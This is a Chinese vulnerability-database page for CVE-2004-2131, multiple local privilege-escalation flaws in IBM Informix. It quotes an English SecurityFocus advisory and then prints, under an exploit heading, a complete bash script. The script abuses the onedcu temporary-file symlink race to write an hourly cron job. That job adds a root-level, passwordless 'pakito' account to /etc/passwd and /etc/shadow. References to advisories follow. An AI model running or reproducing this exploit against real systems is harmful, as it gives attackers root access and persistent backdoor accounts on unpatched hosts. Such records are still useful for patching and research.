IBM Informix多个本地权限提升漏洞

IBM Informix多个本地权限提升漏洞

漏洞ID 1107444 漏洞类型 未知
发布时间 2003-08-08 更新时间 2005-10-20
图片[1]-IBM Informix多个本地权限提升漏洞-安全小百科CVE编号 CVE-2004-2131
图片[2]-IBM Informix多个本地权限提升漏洞-安全小百科CNNVD-ID CNNVD-200401-061
漏洞平台 Unix CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/23609
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200401-061
|漏洞详情
IBMInformixDynamicServer(IDS)是美国IBM公司的一款可扩展的对象关系数据库服务器,它为集群数据中心提供持续数据可用性和灾难恢复等功能。IBMInformixDymanicServer和InformixExtendedParallelServer包含安全问题,本地攻击者可以利用这些漏洞进行权限提升,访问文件系统等攻击。这些漏洞可导致获得root用户权限或读取所有系统文件。目前没有详细漏洞细节提供。
|漏洞EXP
source: http://www.securityfocus.com/bid/9512/info

IBM Informix Dynamic Server and IBM Informix Extended Parallel Server have been reported prone to multiple vulnerabilities.

The first issue exists in the onedcu binary. Specifically, when the binary is invoked a predictable temporary file is created. A local attacker may exploit this issue to launch symbolic link style attacks ultimately resulting in elevated privileges.

The second issue that has been reported to exist in the ontape binary. The ontape binary has been reported to be prone to a local stack based buffer overflow vulnerability. Ultimately the attacker may exploit this condition to influence execution flow of the vulnerable binary into attacker-controlled memory. This may lead to the execution of arbitrary instructions with elevated privileges.

A third issue has been reported to affect the onshowaudit binary. Specifically, the onshowaudit binary reads data from temporary files contained in the "tmp? directory. These files have predictable filenames; an attacker may exploit this issue to disclose data that may be used in further attacks launched against the vulnerable system. 

#!/bin/bash

ONEDCU=/home/informix-9.40/bin/onedcu
CRONFILE=/etc/cron.hourly/pakito
USER=pakito
DIR=./trash

export INFORMIXDIR=/home/informix-9.40/
export ONCONFIG=onconfig.std

        if [ -d $DIR ]; then
                echo Trash directory already created
        else
                mkdir $DIR
        fi

cd $DIR
        if [ -f ./"01" ]; then
                echo Link Already Created
        else
                ln -s $CRONFILE `echo -e "01"`
        fi

umask 000
$ONEDCU &
kill -9 `pidof $ONEDCU`


echo "echo "#!/bin/bash"" > $CRONFILE
echo "echo "$USER:x:0:0::/:/bin/bash" >> /etc/passwd" >> $CRONFILE
echo "echo "$USER::12032:0:99999:7:::" >> /etc/shadow" >> $CRONFILE
echo " "
echo "  This vulnerability was researched by Juan Manuel Pascual Escriba"
echo "  08/08/2003 Barcelona - Spain pask@
3s.com
echo " "
echo "  must wait until cron execute $CRONFILE and then exec su pakito"
|参考资料

来源:BID
名称:9512
链接:http://www.securityfocus.com/bid/9512
来源:www-1.ibm.com
链接:http://www-1.ibm.com/support/docview.wss?uid=swg21153336
来源:BUGTRAQ
名称:20040129———-==========OPEN3S-2003-08-08-eng-informix-ontape
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=107539878804074&w;=2
来源:XF
名称:informix-ontape-binary-bo(14970)
链接:http://xforce.iss.net/xforce/xfdb/14970
来源:OSVDB
名称:3759
链接:http://www.osvdb.org/3759
来源:SECUNIA
名称:10737
链接:http://secunia.com/advisories/10737/

相关推荐: iSearch isearch.inc.php PHP文件注入漏洞

iSearch isearch.inc.php PHP文件注入漏洞 漏洞ID 1200621 漏洞类型 未知 发布时间 2004-12-31 更新时间 2004-12-31 CVE编号 CVE-2004-2341 CNNVD-ID CNNVD-200412-5…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享